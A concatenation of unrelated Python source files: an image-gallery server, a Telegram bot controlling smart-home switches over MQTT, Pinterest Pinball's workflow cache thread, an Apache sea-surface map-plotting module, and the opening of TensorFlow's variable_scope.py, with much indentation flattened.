    parser.add_argument('-n', '--images_per_row', type=int, help='Images per row', default=IMAGES_PER_ROW)
    parser.add_argument('-w', '--thumbnail_width', type=int, help='Width of each thumbnail', default=THUMBNAIL_WIDTH)
    # The port is optional - without it we fall back to the PORT default
    parser.add_argument('port', type=int, nargs='?', help='Port for image-serve', default=PORT)
    parser.add_argument('-f', '--folder_path', type=str, help='Folder path to serve HTML from', default='.')
    return parser.parse_args()
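# Example invocation (values are illustrative):
#   python imageme.py 8000 -n 4 -w 600 -f ./photos
# serves ./photos on port 8000 with 4 images per row and 600px-wide thumbnails.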
def load_global_variables(args):
# todo: Use a cleaner approach afterwards
global IMAGES_PER_ROW, THUMBNAIL_WIDTH, PORT
IMAGES_PER_ROW = args.images_per_row
THUMBNAIL_WIDTH = args.thumbnail_width
PORT = args.port
if __name__ == '__main__':
# Generate indices and serve from the current directory downwards when run
# as the entry point
args = parse_args()
load_global_variables(args)
serve_dir(args.folder_path)
|
dg-SmartHome-cp.py
|
#from secure import NAME, TOKEN, TOPIC
import os
NAME = os.environ.get('NAME', None)
TOKEN = os.environ.get('TOKEN', None)
TOPIC = [os.environ.get('TOPIC_1', None), os.environ.get('TOPIC_2', None)]
URL_STR = os.environ.get('URL_STR', None)
HEROKU = os.environ.get('HEROKU', None)
import paho.mqtt.client as mqtt #pip install paho-mqtt
from queue import Queue
import cherrypy
import logging
import telegram
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, Dispatcher
import time
import threading
import urllib.parse as urlparse
TOPIC_STATUS = [0, 0]
TOPIC_CHANGES = [0, 0]
# User-facing strings are in Russian; English translations in the comments
text_topic = ["Cвет в спальне ", "Удлинитель "]  # "Bedroom light", "Power strip"
text_ON = "Включить"    # "Turn on"
text_OFF = "Выключить"  # "Turn off"
reply_ON = "Включено"   # "Turned on"
reply_OFF = "Выключено"  # "Turned off"
# https://apps.timwhitlock.info/emoji/tables/unicode
icon_ON = u'\U00002705'  # 2705 (white heavy check mark)
icon_OFF = u'\U0000274C'  # 274C (cross mark)
chat_ids = [199220133, 537459034, 1069772271]
if HEROKU == '1':
    print("HEROKU")
    bot = telegram.Bot(token=TOKEN, base_url='https://api.telegram.org/bot')
else:
    bot = telegram.Bot(token=TOKEN, base_url='https://dg-telegram-bot-2.herokuapp.com/bot')
#logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Define event callbacks
def on_connect(client, userdata, flags, rc):
print("on_connect rc: " + str(rc))
def on_message(client, obj, msg):
global TOPIC_STATUS
print("on_message " + msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
for i, t in enumerate(TOPIC):
if msg.topic == t:
TOPIC_CHANGES[i] = 1
if msg.payload == b'ON':
TOPIC_STATUS[i] = 1
elif msg.payload == b'OFF':
TOPIC_STATUS[i] = 0
print(TOPIC,TOPIC_STATUS,TOPIC_CHANGES)
send_KB_()
def on_publish(client, obj, mid):
print("on_publish mid: " + str(mid))
def on_subscribe(client, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(client, obj, level, string):
print(string)
mqttc = mqtt.Client()
# Assign event callbacks
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Uncomment to enable debug messages
#mqttc.on_log = on_log
# Parse CLOUDMQTT_URL (or fallback to localhost)
url = urlparse.urlparse(URL_STR)
# Connect
mqttc.username_pw_set(url.username, url.password)
mqttc.connect(url.hostname, url.port)
#mqttc.connect_async(url.hostname, url.port)
# Start subscribe, with QoS level 0
for t in TOPIC:
mqttc.subscribe(t)
def send_KB_():
icon = []
not_icon = []
text = []
reply = " "
icon_reply = " "
for s,c in zip(TOPIC_STATUS,TOPIC_CHANGES):
icon.append(icon_ON if s else icon_OFF)
not_icon.append(icon_OFF if s else icon_ON)
text.append(text_OFF if s else text_ON)
if c == 1:
reply = reply_ON if s else reply_OFF
icon_reply = icon_ON if s else icon_OFF
print(icon, not_icon, text)
custom_keyboard = [[text_topic[1] + icon[1], text_topic[0] + icon[0]],
[text_topic[1] + "\n" + text[1] + " " + not_icon[1], text_topic[0] + "\n" + text[0] + " " + not_icon[0]]]
reply_markup = telegram.ReplyKeyboardMarkup(custom_keyboard)
for chat_id in chat_ids:
try:
bot.send_message(chat_id=chat_id, text=reply + " " + icon_reply, reply_markup=reply_markup)
        except Exception:
            # Skip chats we can't reach (e.g. the user has blocked the bot)
            pass
TOPIC_CHANGES[0] = 0
TOPIC_CHANGES[1] = 0
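# Sketch of the reply keyboard send_KB_() builds (exact labels depend on
# TOPIC_STATUS): row 1 shows each topic with its current state icon, e.g.
# "Удлинитель ✅  Cвет в спальне ❌"; row 2 offers the opposite action per topic,
# e.g. "Удлинитель\nВключить ✅" when the power strip is currently off.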
class SimpleWebsite(object):
@cherrypy.expose
def index(self):
return """<H1>Welcome!</H1>"""
class BotComm(object):
exposed = True
def __init__(self, TOKEN, NAME):
super(BotComm, self).__init__()
self.TOKEN = TOKEN
self.NAME = NAME
self.bot = telegram.Bot(self.TOKEN)
try:
self.bot.setWebhook("https://{}.herokuapp.com/{}".format(self.NAME, self.TOKEN))
        except Exception as exc:
            raise RuntimeError("Failed to set the webhook") from exc
self.update_queue = Queue()
self.dp = Dispatcher(self.bot, self.update_queue)
self.dp.add_handler(CommandHandler("start", self._start))
self.dp.add_handler(MessageHandler(Filters.text, self._handler))
self.dp.add_error_handler(self._error)
@cherrypy.tools.json_in()
def POST(self, *args, **kwargs):
update = cherrypy.request.json
update = telegram.Update.de_json(update, self.bot)
self.dp.process_update(update)
def _error(self, error):
cherrypy.log("Error occurred - {}".format(error))
def _start(self, bot, update):
update.effective_message.reply_text("Hi!")
def _handler(self, bot, update):
global TOPIC
global TOPIC_STATUS
print("MESSAGE", update.message.chat_id, update.message.text)
if update.message.text == 'kb' or update.message.text == 'keyboard':
send_KB_()
elif text_ON in update.message.text and text_topic[0] in update.message.text:
mqttc.publish(TOPIC[0], "ON", 0, True)
TOPIC_CHANGES[0] = 1
elif text_OFF in update.message.text and text_topic[0] in update.message.text:
mqttc.publish(TOPIC[0], "OFF", 0, True)
TOPIC_CHANGES[0] = 1
elif text_ON in update.message.text and text_topic[1] in update.message.text:
mqttc.publish(TOPIC[1], "ON", 0, True)
TOPIC_CHANGES[1] = 1
elif text_OFF in update.message.text and text_topic[1] in update.message.text:
mqttc.publish(TOPIC[1], "OFF", 0, True)
TOPIC_CHANGES[1] = 1
else:
update.message.reply_text(text=update.message.text)
class ExcThread(threading.Thread):
"""LogThread should always e used in preference to threading.Thread.
The interface provided by LogThread is identical to that of threading.Thread,
however, if an exception occurs in the thread the error will be logged
(using logging.exception) rather than printed to stderr.
This is important in daemon style applications where stderr is redirected
to /dev/null.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._real_run = self.run
self.run = self._wrap_run
def _wrap_run(self):
try:
self._real_run()
        except Exception:
            # Report the traceback instead of letting the thread die silently
            logging.exception("CAUGHT EXCEPTION in %s", self.name)
if __name__ == "__main__":
# Port is given by Heroku
PORT = os.environ.get('PORT', '5000')
# Set up the cherrypy configuration
cherrypy.config.update({'server.socket_host': '0.0.0.0', })
cherrypy.config.update({'server.socket_port': int(PORT), })
cherrypy.tree.mount(SimpleWebsite(), "/")
cherrypy.tree.mount(BotComm(TOKEN, NAME),
"/{}".format(TOKEN),
{'/': {'request.dispatch': cherrypy.dispatch.MethodDispatcher()}})
print('START ... ')
    #thread1 = threading.Thread(target=mqttc.loop_start)
    # Pass the callables themselves as thread targets - calling them here would
    # run them in the main thread and hand the Thread a None target
    thread1 = ExcThread(target=mqttc.loop_start)
    thread1.start()
    print('MIDDLE ... ')
    #thread2 = threading.Thread(target=cherrypy.engine.start) # updater.idle()
    thread2 = ExcThread(target=cherrypy.engine.start) # updater.idle()
    thread2.start()
print('END ... ')
|
cache_thread.py
|
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from threading import Thread
from pinball.config.utils import get_log
from pinball.ui.data_builder import DataBuilder
LOG = get_log('pinball.ui.cache_thread')
__author__ = 'Julia Oh, Mao Ye'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = ['Julia Oh', 'Mao Ye']
__license__ = 'Apache'
__version__ = '2.0'
def start_cache_thread(dbstore):
"""Creates and starts a daemon thread for workflow data computation.
This method is called when pinball ui server starts.
Args:
dbstore: The store to retrieve runs status.
Returns:
cache_thread
"""
thread = Thread(target=_compute_workflow, args=[dbstore])
thread.daemon = True
thread.start()
return thread
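# Minimal usage sketch (the dbstore construction is deployment-specific and
# hypothetical here):
#
#   cache_thread = start_cache_thread(dbstore)
#   # ... later, UI handlers can serve get_workflows_json() without recomputing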
def _compute_workflow(dbstore):
"""Cache thread's target callable that computes the workflow.
This runnable is called my thread's run() method when thread
starts. It will compute workflows data, serialize it, and store it
in _WORKFLOW_JSON. This computation will infinitely
repeat itself, constantly updating the _WORKFLOW_JSON until pinball_ui
server stops.
Args:
dbstore: The store to retrieve runs status.
"""
global _WORKFLOWS_JSON
data_builder = DataBuilder(dbstore, use_cache=True)
while True:
try:
LOG.info("Workflow data computation starting.")
workflows_data = data_builder.get_workflows()
schedules_data = data_builder.get_schedules()
_WORKFLOWS_JSON = _serialize(workflows_data, schedules_data)
LOG.info("Workflow data computation complete.")
# TODO(mao): Tune this parameter depending on future
# pinball user experience.
# TODO(mao): Make this computation run at scheduled time intervals
# and cancel the next execution if the previous job hasn't
# finished.
time.sleep(60 * 20)
except Exception as e:
LOG.exception(e)
def _serialize(workflows_data, schedules_data):
workflow_emails = {}
workflows_info = []
for schedule in schedules_data:
workflow_emails[schedule.workflow] = schedule.emails
for workflow in workflows_data:
workflow_data = workflow.format()
if workflow.workflow in workflow_emails:
workflow_data['owners'] = ','.join(email.split('@')[0]
for email in workflow_emails[workflow.workflow])
else:
workflow_data['owners'] = 'N/A'
workflows_info.append(workflow_data)
return json.dumps({'aaData': workflows_info})
def get_workflows_json():
return _WORKFLOWS_JSON
_WORKFLOWS_JSON = _serialize([], [])
|
mapplot.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
from multiprocessing import Process, Manager
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
from . import BaseDomsHandler
from . import ResultsStorage
if not matplotlib.get_backend():
matplotlib.use('Agg')
PARAMETER_TO_FIELD = {
"sst": "sea_water_temperature",
"sss": "sea_water_salinity"
}
PARAMETER_TO_UNITS = {
"sst": "($^\circ$ C)",
"sss": "(g/L)"
}
def __square(minLon, maxLon, minLat, maxLat):
if maxLat - minLat > maxLon - minLon:
a = ((maxLat - minLat) - (maxLon - minLon)) / 2.0
minLon -= a
maxLon += a
elif maxLon - minLon > maxLat - minLat:
a = ((maxLon - minLon) - (maxLat - minLat)) / 2.0
minLat -= a
maxLat += a
return minLon, maxLon, minLat, maxLat
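# Worked example (illustrative numbers): __square(0, 10, 0, 4) pads the shorter
# latitude span by 3 degrees on each side and returns (0, 10, -3, 7), i.e. a
# square 10 x 10 degree bounding box for the Basemap view.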
def render(d, lats, lons, z, primary, secondary, parameter):
fig = plt.figure()
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_title(f'{primary} vs. {secondary}')
# ax.set_ylabel('Latitude')
# ax.set_xlabel('Longitude')
minLatA = np.min(lats)
maxLatA = np.max(lats)
minLonA = np.min(lons)
maxLonA = np.max(lons)
minLat = minLatA - (abs(maxLatA - minLatA) * 0.1)
maxLat = maxLatA + (abs(maxLatA - minLatA) * 0.1)
minLon = minLonA - (abs(maxLonA - minLonA) * 0.1)
maxLon = maxLonA + (abs(maxLonA - minLonA) * 0.1)
minLon, maxLon, minLat, maxLat = __square(minLon, maxLon, minLat, maxLat)
# m = Basemap(projection='mill', llcrnrlon=-180,llcrnrlat=-80,urcrnrlon=180,urcrnrlat=80,resolution='l')
m = Basemap(projection='mill', llcrnrlon=minLon, llcrnrlat=minLat, urcrnrlon=maxLon, urcrnrlat=maxLat,
resolution='l')
m.drawparallels(np.arange(minLat, maxLat, (maxLat - minLat) / 5.0), labels=[1, 0, 0, 0], fontsize=10)
m.drawmeridians(np.arange(minLon, maxLon, (maxLon - minLon) / 5.0), labels=[0, 0, 0, 1], fontsize=10)
m.drawcoastlines()
m.drawmapboundary(fill_color='#99ffff')
m.fillcontinents(color='#cc9966', lake_color='#99ffff')
# lats, lons = np.meshgrid(lats, lons)
masked_array = np.ma.array(z, mask=np.isnan(z))
z = masked_array
values = np.zeros(len(z))
for i in range(0, len(z)):
values[i] = ((z[i] - np.min(z)) / (np.max(z) - np.min(z)) * 20.0) + 10
x, y = m(lons, lats)
im1 = m.scatter(x, y, values)
im1.set_array(z)
cb = m.colorbar(im1)
units = PARAMETER_TO_UNITS[parameter] if parameter in PARAMETER_TO_UNITS else PARAMETER_TO_UNITS["sst"]
cb.set_label("Difference %s" % units)
buf = io.BytesIO()
plt.savefig(buf, format='png')
plot = buf.getvalue()
if d is not None:
d['plot'] = plot
return plot
class DomsMapPlotQueryResults(BaseDomsHandler.DomsQueryResults):
def __init__(self, lats, lons, z, parameter, primary, secondary, args=None, bounds=None, count=None, details=None,
computeOptions=None, executionId=None, plot=None):
BaseDomsHandler.DomsQueryResults.__init__(self, results={"lats": lats, "lons": lons, "values": z}, args=args,
details=details, bounds=bounds, count=count,
computeOptions=computeOptions, executionId=executionId)
self.__lats = lats
self.__lons = lons
self.__z = np.array(z)
self.__parameter = parameter
self.__primary = primary
self.__secondary = secondary
self.__plot = plot
def toImage(self):
return self.__plot
def renderAsync(x, y, z, primary, secondary, parameter):
manager = Manager()
d = manager.dict()
p = Process(target=render, args=(d, x, y, z, primary, secondary, parameter))
p.start()
p.join()
return d['plot']
def createMapPlot(id, parameter, config=None):
with ResultsStorage.ResultsRetrieval(config) as storage:
params, stats, data = storage.retrieveResults(id)
primary = params["primary"]
secondary = params["matchup"][0]
lats = []
lons = []
z = []
field = PARAMETER_TO_FIELD[parameter] if parameter in PARAMETER_TO_FIELD else PARAMETER_TO_FIELD["sst"]
for entry in data:
for match in entry["matches"]:
if match["source"] == secondary:
if field in entry and field in match:
a = entry[field]
b = match[field]
z.append((a - b))
z.append((a - b))
else:
z.append(1.0)
z.append(1.0)
lats.append(entry["y"])
lons.append(entry["x"])
lats.append(match["y"])
lons.append(match["x"])
plot = renderAsync(lats, lons, z, primary, secondary, parameter)
r = DomsMapPlotQueryResults(lats=lats, lons=lons, z=z, parameter=parameter, primary=primary, secondary=secondary,
args=params,
details=stats, bounds=None, count=None, computeOptions=None, executionId=id, plot=plot)
return r
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange, zip # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.types import core
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
__slots__ = ["_full_shape", "_var_offset"]
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_abc.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_abc.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for offset, shape in zip(var_offset, full_shape):
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_abc.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
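# Worked example for _PartitionInfo (illustrative values): with
# full_shape=[10, 20] and var_offset=[0, 5], a partition of shape [10, 5] gives
# single_slice_dim() == 1 (only dimension 1 differs from the full shape) and
# single_offset() == 5 (this partition's offset along that dimension).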
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
def _needs_no_arguments(python_callable):
"""Returns true if the callable needs no arguments to call."""
# TODO(bfontain): Switch to inspect.signature when we are python 3 only.
# signature = inspect.signature(python_callable)
# return not [1 for param in signature.parameters.values()
# if param.default == param.empty]
num_arguments = len(tf_inspect.getargspec(python_callable).args)
if not tf_inspect.isfunction(python_callable) and not isinstance(
python_callable, functools.partial):
# getargspec includes self for function objects (which aren't
# functools.partial). This has no default so we need to remove it.
# It is not even an argument so its odd that getargspec returns this.
# Note that this is fixed with inspect.signature in Python 3.
num_arguments -= 1
return num_arguments == len(
tf_inspect.getargspec(python_callable).defaults or [])
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
__slots__ = ["_vars", "_partitioned_vars", "_store_eager_variables"]
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs): return getter(name +
'_suffix', *args, **kwargs) ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_abc.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
